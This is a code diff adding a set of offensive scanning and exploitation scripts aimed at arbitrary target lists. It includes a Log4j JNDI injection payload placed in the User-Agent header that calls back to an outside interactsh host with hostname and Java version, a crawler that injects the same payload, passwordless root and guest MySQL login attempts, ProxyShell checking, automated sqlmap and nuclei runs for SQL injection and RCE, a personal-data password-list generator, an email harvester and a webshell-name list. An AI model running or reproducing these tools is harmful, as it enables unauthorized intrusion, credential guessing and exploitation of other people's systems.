", "") + except: + print("No mailbox found...") + + output_string = f"{url}, {mailbox}, {user}, {version}, {created}, localtime: {str(datetime.now())}\n" + print(colorama.Fore.RED + output_string) + with open(output_file, "a") as my_file: + my_file.write(output_string) + else: + print(colorama.Fore.GREEN + url + " no vuln text match found...") + + if response.headers.get("x-owa-version"): + print(f"colorama.Fore.GREEN{url}, OWA: {response.headers.get('x-owa-version')}") + except requests.exceptions.ConnectionError: + pass + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Check websites for exchange proxyshell vulnerability." + ) + parser.add_argument( + "-i", type=str, default="./input.txt", help="Path to input file" + ) + parser.add_argument( + "-o", type=str, default="./output.txt", help="Path to output file" + ) + args = parser.parse_args() + input_file = args.i + output_file = args.o + main() \ No newline at end of file diff --git a/scripts/check-log4j.py b/scripts/check-log4j.py new file mode 100644 index 0000000..d1b6c11 --- /dev/null +++ b/scripts/check-log4j.py @@ -0,0 +1,56 @@ +from concurrent.futures import ThreadPoolExecutor +import argparse +import requests +from datetime import datetime + +requests.packages.urllib3.disable_warnings() +import colorama +colorama.init(autoreset=True) + +# ${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.${sys:java.version}.xxx.interactsh.com/pocrequest} + +def main(): + http = "https://" + with open(input_file, "r") as myfile: + content = myfile.readlines() + + with ThreadPoolExecutor(max_workers=20) as executor: + for url in content: + if url.startswith("http"): + http = "" + # only use url and not banner + if "," in url: + url_array = url.split(",") + url = url_array[0] + executor.submit(start_poc, http + url.strip()) + +def start_poc(input_url): + try: + url = input_url + session = requests.session() + session.headers[ + "User-Agent" + ] = "${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.${sys:java.version}.c6rens5cefo0bvo539ngcg5qzhyyyyyyn.interactsh.com/pocrequest}" + response = session.get( + url=url, + timeout=5, + verify=False, + ) + session.close() + + if response.status_code == 200: + print(colorama.Fore.GREEN + url) + + except requests.exceptions.ConnectionError: + pass + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Check websites for log4j vulns." + ) + parser.add_argument( + "-i", type=str, default="./input.txt", help="Path to input file" + ) + args = parser.parse_args() + input_file = args.i + main() \ No newline at end of file diff --git a/scripts/check-mysql.py b/scripts/check-mysql.py new file mode 100644 index 0000000..57f131c --- /dev/null +++ b/scripts/check-mysql.py @@ -0,0 +1,44 @@ +import mysql.connector +from concurrent.futures import ThreadPoolExecutor +import argparse + + +def main(): + with open(input_file, "r") as myfile: + content = myfile.read() + + # parse nmap normal format output + split_port = content.split("3306/tcp") + with ThreadPoolExecutor(max_workers=20) as executor: + for port in split_port: + host_part = port.split("Nmap scan report for ") + host_part_2 = host_part[len(host_part) - 1].split("(") + host = host_part_2[0] + + executor.submit(check_server, host, "root") + executor.submit(check_server, host, "user") + executor.submit(check_server, host, "gast") + executor.submit(check_server, host, "guest") + +def check_server(host, user): + try: + cnx = mysql.connector.connect(host=host, user=user, connection_timeout=5) + cnx.close() + print("Connection worked: " + user + "@" + host) + with open(output_file, "a") as my_file: + my_file.write(user + "@" + host + "\n") + except Exception as e: + pass + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Check MySQL Server conenctions.") + parser.add_argument( + "-i", type=str, default="./input.txt", help="Path to nmap scan (normal output format)" + ) + parser.add_argument( + "-o", type=str, default="./output.txt", help="Path to output file" + ) + args = parser.parse_args() + input_file = args.i + output_file = args.o + main() \ No newline at end of file diff --git a/scripts/cont-scan.py b/scripts/cont-scan.py new file mode 100644 index 0000000..12fd4be --- /dev/null +++ b/scripts/cont-scan.py @@ -0,0 +1,6 @@ +import os +import time + +for count in range(1, 1000): + os.system('python3 scripts/check-exchange.py -i domain.txt -o domaint.txt') + time.sleep(60) diff --git a/scripts/crawler.py b/scripts/crawler.py new file mode 100644 index 0000000..1429a59 --- /dev/null +++ b/scripts/crawler.py @@ -0,0 +1,184 @@ +import site +import requests + +requests.packages.urllib3.disable_warnings() +from concurrent.futures import ThreadPoolExecutor +import colorama +from colorama import Fore +import os +import re +from urllib.parse import urlparse +from bs4 import BeautifulSoup + +colorama.init(autoreset=True) +import argparse + +folder = os.path.dirname(__file__) +visited_pages = [] +output_strings = [] +max_crawl_depth = 2 +max_crawl_count = 10 + + +def main(): + with open(input_file, "r") as myfile: + content = myfile.readlines() + + with ThreadPoolExecutor(max_workers=20) as executor: + for line in content: + # only use url and not banner + if "," in line: + url_array = line.split(",") + line = url_array[0] + url = line.strip() + if line.startswith("http"): + executor.submit(start_crawler, url, 0, 0) + else: + executor.submit(start_crawler, "http://" + url + "/", 0, 0) + executor.submit( + start_crawler, "http://" + url + ":8080/", 0, 0 + ) + executor.submit( + start_crawler, "http://" + url + ":8081/", 0, 0 + ) + executor.submit( + start_crawler, "https://" + url + "/", 0, 0 + ) + executor.submit( + start_crawler, "https://" + url + ":4434/", 0, 0 + ) + executor.submit( + start_crawler, "https://" + url + ":8443/", 0, 0 + ) + +def start_crawler(url, limit, counter): + limit = limit + 1 + if limit > max_crawl_depth: + return + + if counter > max_crawl_count: + return + + try: + site_response = request_url(url) + if site_response: + # find links and start crawling! + soup = BeautifulSoup(site_response.text, "html.parser") + get_banner(site_response) + parsed_url = urlparse(site_response.url) + base_tag = soup.find("base") + link_array = re.findall( + r"(http|https):\/\/([\w\-_]+(?:(?:\.[\w\-_]+)+))([\w\-\.,@?^=%&:/~\+#]*[\w\-\@?^=%&/~\+#])?", + site_response.text, + ) + + # get html links + a_tags = soup.find_all("a") + for a_tag in a_tags: + counter = counter + 1 + link = a_tag.attrs.get("href") + + if link and link.startswith("/"): + port = "" + if parsed_url.port: + port = ":" + str(parsed_url.port) + full_link = ( + parsed_url.scheme + "://" + parsed_url.hostname + port + link + ) + start_crawler(full_link, limit, counter) + + # check base tag urls + if base_tag: + base = base_tag.attrs.get("href") + port = "" + if parsed_url.port: + port = ":" + str(parsed_url.port) + full_link = parsed_url.scheme + "://" + base + port + link + start_crawler(full_link, limit, counter) + + # absolut urls to same domain + if link and link.startswith("http:"): + if parsed_url.hostname in link: + start_crawler(link, limit, counter) + + # get http links + for link_parts in link_array: + full_url = link_parts[0] + "://" + link_parts[1] + link_parts[2] + if parsed_url.hostname in full_url: + counter = counter + 1 + start_crawler(full_url, limit, counter) + except Exception as e: + print(e) + +def request_url(url): + try: + if url not in visited_pages: + safe_url = "" + try: + safe_url = url.findall("\w") + safe_url = safe_url[0] + except: + pass + session = requests.session() + # session.headers[ + # "User-Agent" + # ] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36" + session.headers[ + "User-Agent" + ] = "${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.${sys:java.version}.c6scl2is1s41vcjs2890cghcidoyyyyyn.interactsh.com/pocrequest}" + header = session.head(url=url, timeout=3, verify=False) + + # check status code + if header.status_code >= 400: + return False + + # check content type + one_allowed_content_type = False + for allowed_content_type in ["html", "plain", "xml", "text", "json"]: + if ( + not header.headers.get("content-type") + or allowed_content_type + in header.headers.get("content-type").lower() + ): + one_allowed_content_type = True + if not one_allowed_content_type: + return False + + response = session.get(url=url, timeout=3, verify=False) + session.close() + + visited_pages.append(url) + return response + + except Exception as e: + return False + +def get_banner(response): + banner_array = [] + banner_array.append(response.url) + try: + banner_array.append(response.headers.get("Server")) + except: + pass + + fullstring = ", ".join(str(item) for item in banner_array) + if fullstring not in output_strings: + output_strings.append(fullstring) + print(Fore.GREEN + fullstring) + with open(output_file, "a") as out: + out.write(fullstring + "\n") + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Crawl websites from domain or url list." + ) + parser.add_argument( + "-i", type=str, default="./input.txt", help="Path to input file" + ) + parser.add_argument( + "-o", type=str, default="./output.txt", help="Path to output file" + ) + args = parser.parse_args() + input_file = args.i + output_file = args.o + main() \ No newline at end of file diff --git a/scripts/discover.py b/scripts/discover.py new file mode 100644 index 0000000..a09d094 --- /dev/null +++ b/scripts/discover.py @@ -0,0 +1,138 @@ +import os +import argparse + + +def main(input_file, folder, vuln, hard, skip): + try: + if input_file != "no": + # use input file + with open(input_file, "r") as myfile: + content = myfile.readlines() + for line in content: + start_wizard(line.strip(), folder, vuln, hard, skip) + else: + # ask for target domain + print("Target domain:") + domain = input() + start_wizard(domain, folder, vuln, hard, skip) + except KeyboardInterrupt as e: + print(e) + +def start_wizard(domain, folder, vuln, hard, skip): + domain = domain.strip() + folder = folder.strip() + + print(f"\nStart with: {domain}") + domain_parts = domain.split("/") + if len(domain_parts) >= 2: + domain = domain_parts[2].replace("www.", "") + + if os.path.exists(f"{folder}/{domain}") == True and skip == "yes": + print( + "Folder in " + + folder + + " already exist, skip subdomain recon for " + + domain + + "." + ) + return + + if os.path.exists(f"{folder}/{domain}") == False: + os.system(f'mkdir "{folder}/{domain}"') + + if os.path.exists(f'{folder}/{domain}/subs.txt') == False: + os.system(f'echo "{domain}" > "{folder}/{domain}/subs.txt"') + os.system(f'subfinder -d "{domain}" -o "{folder}/{domain}/subs.txt"') + + if os.path.exists(f'{folder}/{domain}/active_banner.txt') == False: + print("\nCheck if websites are up!") + os.system( + "~/go/bin/httpx -nc -fhr -title -tech-detect -server -status-code -p 80,8080,8081,8443,443,4434,4433,8443,5000,1337 -mc 200 -retries 0 -timeout 3 -maxhr 1 -l '" + + folder + + domain + + "/subs.txt' -o '" + + folder + + domain + + "/active_banner.txt'" + ) + + if os.path.exists(f'{folder}/{domain}/active.txt') == False: + os.system( + "awk -F' ' '{print $1}' '" + + folder + + domain + + "/active_banner.txt' > '" + + folder + + domain + + "/active.txt'" + ) + + if os.path.exists(f'{folder}/{domain}/crawled.txt') == False: + os.system( + "python3 scripts/crawler.py -i '" + + folder + + domain + + "/active.txt' -o '" + + folder + + domain + + "/crawled.txt'" + ) + + if vuln.lower() == "yes": + if os.path.exists(f'{folder}/{domain}/cve.txt') == False: + # scan for more vulns + more_tags = "" + if hard.lower() == "yes": + more_tags = ",sqli,rce" + + print("\nTesting: Services") + os.system( + "nmap -sV -Pn --top-ports 50 --script vulners --script-args mincvss=8 --open -iL '" + + folder + + domain + + "/active.txt' -oN '" + + folder + + domain + + "/nmap.txt'" + ) + + print("\nTesting: Security") + os.system( + "~/go/bin/nuclei -l '" + + folder + + domain + + "/active.txt' -tags cve" + more_tags + " -retries 0 -mhe 1 -s critical -o '" + + folder + + domain + + "/cve.txt'" + ) + + if os.path.exists(f'{folder}/{domain}/org.txt') == False and os.path.exists(f'{folder}/{domain}/cve.txt') == True: + print("\nCheck org/network information!") + os.system( + "python3 scripts/add-orginfo.py -i '" + + folder + + domain + + "/cve.txt' -o '" + + folder + + domain + + "/org.txt'" + ) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Full discover list.") + parser.add_argument("-i", type=str, default="no", help="Path to input file.") + parser.add_argument( + "-folder", type=str, default="scans/", help="Subfolder to save results." + ) + parser.add_argument( + "-vuln", type=str, default="no", help="Check for critical vulns." + ) + parser.add_argument( + "-hard", type=str, default="no", help="Check for critical SQLi or RCE." + ) + parser.add_argument( + "-skip", type=str, default="yes", help="Skip folder and scan another target." + ) + args = parser.parse_args() + main(args.i, args.folder.lower(), args.vuln.lower(), args.hard.lower(), args.skip.lower()) \ No newline at end of file diff --git a/scripts/domains.py b/scripts/domains.py new file mode 100644 index 0000000..651ffe9 --- /dev/null +++ b/scripts/domains.py @@ -0,0 +1,17 @@ +import os +import time +import colorama +colorama.init(autoreset=True) + +os.system("clear") + +def print_slow(color, input, speed): + text_array = input.split("\n") + for text in text_array: + print(color + text) + time.sleep(speed) + +with open("groups/hosts.txt", "r") as myfile: + fullscan = myfile.read() + +print_slow("", fullscan, 0.1) \ No newline at end of file diff --git a/scripts/generate-passwords.py b/scripts/generate-passwords.py new file mode 100644 index 0000000..f1a1cb9 --- /dev/null +++ b/scripts/generate-passwords.py @@ -0,0 +1,204 @@ +import argparse + +# input all keywords +# start capital letter +# generate password file +output = [] + + +def main(): + # read all keywords + input_keywords = [] + + print("Enter firstname of target") + firstname = input() + input_keywords.append(firstname) + + print("Enter lastname of target:") + lastname = input() + input_keywords.append(lastname) + + print("Year of birth:") + year = input() + input_keywords.append(year) + + print("Month of birth:") + newInput = input() + input_keywords.append(newInput) + + while newInput != "": + print("Next keyword:") + newInput = input() + input_keywords.append(newInput) + + # password pattern + firstname = firstname.lower() + lastname = lastname.lower() + if len(year) == 4: + input_keywords.append(year[2:]) + + guess_numbers = ["0", "1", "2", "3", year, year[2:]] + guess_special_char = ["!", ".", "_", "-"] + + if special_char: + # use special chars between keywords + for spec_char in guess_special_char: + for number in guess_numbers: + addToList(firstname + spec_char) + addToList(lastname + spec_char) + addToList(spec_char + firstname) + addToList(spec_char + lastname) + + addToList(firstname + spec_char + number) + addToList(lastname + spec_char + number) + + addToList(firstname + lastname + spec_char) + addToList(lastname + firstname + spec_char) + + for number in guess_numbers: + addToList(firstname + lastname + spec_char + number) + addToList(lastname + firstname + spec_char + number) + + addToList(firstname + lastname) + addToList(lastname + firstname) + + addToList(firstname + spec_char + lastname) + addToList(lastname + spec_char + firstname) + + for number in guess_numbers: + addToList(firstname + spec_char + lastname + number) + addToList(lastname + spec_char + firstname + number) + else: + # simple combinations without special chars + addToList(firstname) + addToList(lastname) + addToList(firstname + lastname) + addToList(lastname + firstname) + + for number in guess_numbers: + addToList(firstname + number) + addToList(lastname + number) + addToList(firstname + lastname + number) + addToList(lastname + firstname + number) + + addToList(startCapitalLetter(firstname) + startCapitalLetter(lastname)) + addToList(startCapitalLetter(lastname) + startCapitalLetter(firstname)) + + for number in guess_numbers: + addToList( + startCapitalLetter(firstname) + startCapitalLetter(lastname) + number + ) + addToList( + startCapitalLetter(lastname) + startCapitalLetter(firstname) + number + ) + + # remove the last emtpy keyword + input_keywords = input_keywords[:-1] + + # add all keyword combinations + for keyword in input_keywords: + keyword = keyword.lower() + addToList(keyword) + addToList(startCapitalLetter(keyword)) + + for number in guess_numbers: + addToList(keyword + number) + addToList(startCapitalLetter(keyword) + number) + addToList(number + keyword) + addToList(number + startCapitalLetter(keyword)) + + for keyword_2 in input_keywords: + keyword = keyword.lower() + if keyword == keyword_2: + # keyword 1 and 2 are the same + continue + else: + addToList(keyword + keyword_2) + addToList(keyword_2 + keyword) + addToList(startCapitalLetter(keyword) + startCapitalLetter(keyword_2)) + addToList(startCapitalLetter(keyword_2) + startCapitalLetter(keyword)) + + if special_char: + for spec_char in guess_special_char: + addToList(keyword + keyword_2 + number + spec_char) + addToList(keyword_2 + keyword + number + spec_char) + addToList( + startCapitalLetter(keyword) + + startCapitalLetter(keyword_2) + + number + + spec_char + ) + addToList( + startCapitalLetter(keyword_2) + + startCapitalLetter(keyword) + + number + + spec_char + ) + + addToList(keyword + number + keyword_2) + addToList(keyword_2 + number + keyword) + addToList( + startCapitalLetter(keyword) + + number + + startCapitalLetter(keyword_2) + ) + addToList( + startCapitalLetter(keyword_2) + + number + + startCapitalLetter(keyword) + ) + else: + for number in guess_numbers: + addToList(keyword + keyword_2 + number) + addToList(keyword_2 + keyword + number) + addToList( + startCapitalLetter(keyword) + + startCapitalLetter(keyword_2) + + number + ) + addToList( + startCapitalLetter(keyword_2) + + startCapitalLetter(keyword) + + number + ) + + addToList(keyword + number + keyword_2) + addToList(keyword_2 + number + keyword) + addToList( + startCapitalLetter(keyword) + + number + + startCapitalLetter(keyword_2) + ) + addToList( + startCapitalLetter(keyword_2) + + number + + startCapitalLetter(keyword) + ) + +def addToList(string): + # generate password file + if string not in output: + print(string) + f = open(output_file, "a") + f.write(string + "\n") + f.close() + output.append(string) + +def startCapitalLetter(string): + # start capital letter + return string.capitalize() + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Generate password list based on target inputs." + ) + parser.add_argument( + "-o", type=str, default="./passwords.txt", help="Path to output file" + ) + parser.add_argument( + "-special", type=bool, default=False, help="Add special characters" + ) + args = parser.parse_args() + output_file = args.o + special_char = args.special + main() \ No newline at end of file diff --git a/scripts/get-emails.py b/scripts/get-emails.py new file mode 100644 index 0000000..f3e1b0b --- /dev/null +++ b/scripts/get-emails.py @@ -0,0 +1,140 @@ +# get emails from domains with crawling +import requests + +requests.packages.urllib3.disable_warnings() +import colorama +from colorama import Fore +import os +import re +from urllib.parse import urlparse +from bs4 import BeautifulSoup + +colorama.init(autoreset=True) +import argparse + +folder = os.path.dirname(__file__) +visited_pages = [] +all_emails = [] +max_crawl_depth = 5 +max_crawl_count = 1000 + + +def main(): + print("Insert domain:") + # domain = input() + domain = "https://www.domain.de" + domain = domain.strip() + if domain.startswith("http"): + start_crawler(domain, 0, 0) + else: + start_crawler("https://" + domain + "/", 0, 0) + +def start_crawler(url, limit, counter): + limit = limit + 1 + if limit > max_crawl_depth: + return + + if counter > max_crawl_count: + return + + try: + site_response = request_url(url) + if site_response is not False and site_response is not None: + # find links and start crawling! + soup = BeautifulSoup(site_response.text, "html.parser") + get_email(site_response) + parsed_url = urlparse(site_response.url) + + # get html links + a_tags = soup.find_all("a") + for a_tag in a_tags: + counter = counter + 1 + link = a_tag.attrs.get("href") + + if link and link.startswith("/"): + port = "" + if parsed_url.port: + port = ":" + str(parsed_url.port) + full_link = (f"{parsed_url.scheme}://{parsed_url.hostname}{port}{link}") + start_crawler(full_link, limit, counter) + + # check base tag urls + base_tag = soup.find("base") + if base_tag: + base = base_tag.attrs.get("href") + port = "" + if parsed_url.port: + port = ":" + str(parsed_url.port) + full_link = f"{parsed_url.scheme}://{base}{port}{link}" + start_crawler(full_link, limit, counter) + + # absolut urls to same domain + if link and link.startswith("http:"): + if parsed_url.hostname in link: + start_crawler(link, limit, counter) + + # get http links + link_array = re.findall( + r"(http|https):\/\/([\w\-_]+(?:(?:\.[\w\-_]+)+))([\w\-\.,@?^=%&:/~\+#]*[\w\-\@?^=%&/~\+#])?", + site_response.text, + ) + for link_parts in link_array: + full_url = link_parts[0] + "://" + link_parts[1] + link_parts[2] + if parsed_url.hostname in full_url: + counter = counter + 1 + start_crawler(full_url, limit, counter) + except Exception as e: + print(e) + +def request_url(url): + try: + if url not in visited_pages: + session = requests.session() + session.headers[ + "User-Agent" + ] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 CRAWLER" + header = session.head(url=url, timeout=3, verify=False) + + # check status code + if header.status_code >= 400: + return False + + # check content type + one_allowed_content_type = False + for allowed_content_type in ["html", "plain", "xml", "text", "json"]: + if ( + not header.headers.get("content-type") + or allowed_content_type + in header.headers.get("content-type").lower() + ): + one_allowed_content_type = True + if not one_allowed_content_type: + return False + + response = session.get(url=url, timeout=3, verify=False) + session.close() + + visited_pages.append(url) + return response + + except Exception as e: + return False + +def get_email(response): + # print(response.url) + + # find email address in response + # [\w|-|\.|\+]*@[\w|-|\.|\+]*\.\w* + email_array = re.findall(r"[\w|-|\.|\+]*@[\w|-|\.|\+]*\.\w*", response.text) + + for email in email_array: + if email not in all_emails: + all_emails.append(email) + print(email) + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Crawls a website and finds email adresses." + ) + args = parser.parse_args() + main() \ No newline at end of file diff --git a/scripts/get-search.py b/scripts/get-search.py new file mode 100644 index 0000000..46679fb --- /dev/null +++ b/scripts/get-search.py @@ -0,0 +1,93 @@ +import argparse +import requests +from bs4 import BeautifulSoup +import time + + +def main(input_file, output_file, first): + # use input file + current_token = get_first_token() + if input_file != "no": + # use input file + with open(input_file, "r") as myfile: + content = myfile.readlines() + for line in content: + if first == "no": + for counter in range(1, 10): + urls = get_results(line.strip(), counter, current_token) + time.sleep(2) + for url in urls: + print(url) + with open(output_file, "a") as out: + out.write(url + "\n") + else: + # ask for search query + print("Search:") + query = input() + results = [] + for counter in range(1, 10): + (urls, token) = get_results(query, counter, current_token) + results.append(urls) + time.sleep(2) + for result in results: + for url in result: + print(url) + with open(output_file, "a") as out: + out.write(url + "\n") + +def get_first_token(): + session = requests.session() + session.headers[ + "User-Agent" + ] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0" + response = session.get("https://www.startpage.com/") + session.close() + + soup = BeautifulSoup(response.text, "html.parser") + token = soup.find("input", name="sc") + return token + +def get_results(string, counter, token): + search = string + print("Search for " + search) + session = requests.session() + session.headers[ + "User-Agent" + ] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0" + response = session.post( + url="https://www.startpage.com/sp/search", + data={ + "query": search, + "lui": "deutsch", + "language": "deutsch", + "cat": "web", + "sc": token, + "page": str(counter), + "abp": "-1", + "t": "dark" + }, + ) + session.close() + + soup = BeautifulSoup(response.text, "html.parser") + a_tags = soup.findAll("a", class_="result__url") + new_token = soup.find("input", name="sc") + + result = [] + for a in a_tags: + result.append(a.attrs.get("href")) + return (result, new_token) + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Check list of strings against startpage search engine and get the results." + ) + parser.add_argument("-i", type=str, default="no", help="Path to input file") + parser.add_argument( + "-o", type=str, default="output.txt", help="Path to output file" + ) + parser.add_argument( + "-first", type=str, default="no", help="Get only the first result" + ) + args = parser.parse_args() + main(args.i, args.o, args.first) \ No newline at end of file diff --git a/scripts/hunt-shells.py b/scripts/hunt-shells.py new file mode 100644 index 0000000..0cbc5cb --- /dev/null +++ b/scripts/hunt-shells.py @@ -0,0 +1,12 @@ +# TODO: ALLES! + +shell_names = [ + "tmp.aspx", + "temp.aspx", + "proxyshell.aspx", + "shell.aspx", + "aspx.aspx", + "help.aspx", + "backup.aspx", + "" +] \ No newline at end of file diff --git a/scripts/input-sqlmap.py b/scripts/input-sqlmap.py new file mode 100644 index 0000000..9da81f7 --- /dev/null +++ b/scripts/input-sqlmap.py @@ -0,0 +1,22 @@ +import os +import argparse +import re + +def main(input_file): + # use input file + with open(input_file, "r") as myfile: + content = myfile.readlines() + for line in content: + start_wizard(line.strip()) + +def start_wizard(url): + print("Start with: " + url) + match = re.search(r"\d+$", url) + if "?" in url or "=" in url or match is not None: + os.system("sqlmap -u '" + url + "' --batch --banner --random-agent -v 0") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Use sqlmap with a list of domains.") + parser.add_argument("-i", type=str, default="no", help="Path to input file") + args = parser.parse_args() + main(args.i) \ No newline at end of file diff --git a/scripts/leak-checker.py b/scripts/leak-checker.py new file mode 100644 index 0000000..431b47e --- /dev/null +++ b/scripts/leak-checker.py @@ -0,0 +1,148 @@ +from bs4 import BeautifulSoup +import requests + +requests.packages.urllib3.disable_warnings() +from concurrent.futures import ThreadPoolExecutor +import colorama + +colorama.init(autoreset=True) +import os +import argparse + +folder = os.path.dirname(__file__) +visited_pages = [] + + +def main(): + global leaky_paths + + with open(input_file, "r") as myfile: + content = myfile.readlines() + + with open(leak_file_path, "r") as myfile: + leaky_paths = myfile.readlines() + + with ThreadPoolExecutor(max_workers=50) as executor: + for line in content: + if line.startswith("http"): + executor.submit(start_crawler, line.strip()) + else: + executor.submit(start_crawler, "http://" + line.strip() + "/") + executor.submit(start_crawler, "http://" + line.strip() + ":8080/") + executor.submit(start_crawler, "http://" + line.strip() + ":8081/") + executor.submit(start_crawler, "https://" + line.strip() + "/") + executor.submit(start_crawler, "https://" + line.strip() + ":4434/") + executor.submit(start_crawler, "https://" + line.strip() + ":8443/") + +def start_crawler(url): + try: + site_result = request_url(url) + if not type(site_result) == bool: + url_comps = site_result.url.split("/") + for folder_index in range(3, len(url_comps)): + for leaky_path in leaky_paths: + new_url = [] + l_path = leaky_path.strip() + # url magic + for index, comp in enumerate(url_comps): + if len(url_comps) <= 3 or index < len(url_comps) - ( + len(url_comps) - folder_index + ): + new_url.append(comp) + new_url.append(l_path) + new_site_response = request_url("/".join(new_url)) + if not type(new_site_response) == bool: + # filter result + for match_string in [ + 'remote "origin"', + "json", + "<", + "[", + "admin", + ]: + if match_string in new_site_response.text.lower(): + get_banner(new_site_response) + return + + except Exception as e: + print(e) + +def get_banner(response): + soup = BeautifulSoup(response.text, "html.parser") + url = response.url + banner_array = [] + banner_array.append(response.url) + banner_array.append(response.headers.get("Server")) + banner_array.append(str(len(response.text)) + " chars") + try: + if soup.find("title"): + title = soup.find("title").get_text().strip().replace("\n", "") + else: + title = "" + banner_array.append(title) + meta_tags = soup.find_all("meta", attrs={"name": "generator"}) + if len(meta_tags) > 0: + for meta_tag in meta_tags: + banner_array.append(meta_tag.attrs.get("content")) + except Exception as e: + print(e) + fullstring = ", ".join(str(item) for item in banner_array) + + print(colorama.Fore.GREEN + fullstring) + + with open(output_file + "_banner.txt", "a") as my_file: + my_file.write(fullstring + "\n") + + with open(output_file, "a") as my_file: + my_file.write(url + "\n") + +def request_url(url): + try: + if url not in visited_pages: + session = requests.session() + session.headers[ + "User-Agent" + ] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36" + header = session.head(url=url, timeout=3, verify=False) + + # check status code + if header.status_code >= 400: + return False + + # check content type + one_allowed_content_type = False + for allowed_content_type in ["html", "xml", "plain", "json"]: + if allowed_content_type in header.headers.get("content-type").lower(): + one_allowed_content_type = True + + if not one_allowed_content_type or header.is_redirect: + return False + + response = session.get(url=url, timeout=3, verify=False) + session.close() + + visited_pages.append(url) + return response + else: + return False + except Exception as e: + return False + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Check leaky urls from subdomain/domain list." + ) + parser.add_argument( + "-i", type=str, default="./input.txt", help="Path to input url file" + ) + parser.add_argument( + "-o", type=str, default="./output.txt", help="Path to output file" + ) + parser.add_argument( + "-leaky", type=str, default="./leaky.txt", help="Path to leaky names" + ) + args = parser.parse_args() + input_file = args.i + output_file = args.o + leak_file_path = args.leaky + main() \ No newline at end of file diff --git a/scripts/package-lock.json b/scripts/package-lock.json new file mode 100644 index 0000000..607e00a --- /dev/null +++ b/scripts/package-lock.json @@ -0,0 +1,989 @@ +{ + "name": "scripts", + "lockfileVersion": 2, + "requires": true, + "packages": { + "": { + "name": "scripts", + "dependencies": { + "puppeteer": "^10.4.0" + } + }, + "node_modules/@types/node": { + "version": "16.11.4", + "resolved": "https://registry.npmjs.org/@types/node/-/node-16.11.4.tgz", + "integrity": "sha512-TMgXmy0v2xWyuCSCJM6NCna2snndD8yvQF67J29ipdzMcsPa9u+o0tjF5+EQNdhcuZplYuouYqpc4zcd5I6amQ==", + "optional": true + }, + "node_modules/@types/yauzl": { + "version": "2.9.2", + "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.9.2.tgz", + "integrity": "sha512-8uALY5LTvSuHgloDVUvWP3pIauILm+8/0pDMokuDYIoNsOkSwd5AiHBTSEJjKTDcZr5z8UpgOWZkxBF4iJftoA==", + "optional": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "dependencies": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "node_modules/brace-expansion": { + "version": "1.1.11", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", + "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/buffer-crc32": { + "version": "0.2.13", + "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": 